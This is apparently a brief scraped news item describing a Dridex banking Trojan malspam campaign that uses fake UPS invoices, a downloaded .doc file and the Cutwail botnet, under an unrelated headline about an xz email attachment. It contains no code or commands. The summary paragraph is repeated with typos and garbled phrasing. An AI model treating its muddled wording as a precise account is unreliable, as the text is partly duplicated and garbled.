The xz attachment of a fake bank email contains an exe file: the malware.
Technical analysis by the Malware Hunter JAMESWT
Dridex leverages fake UPS invoices and the Cutwail botnet to spread in a new global campaign. The email contains a link that downloads a .doc attachment. The file contacts a random url from an internal list of nine and downloads a DLL, which starts the malware infection
Dridex uses an attachment a link and a word attachment to spread itself in a global malspam campaign. Within an email, presumably a UPS invoice, there is a link to a url which, if opened, downloads a .doc file. This contacts a random link from an internal list aof nine nd downloads the DLL, which starts the malware infection chain. Moreover, as cybersecurity researcher moto_sato detected, malicious documents are distributed by the Cutwail botnet. Dridex is a very dangerous banking Trojan used by cybercrime, which has long been the protagonist of campaigns all over the world, especially with a courier theme. The targets are mainly companies, but not only.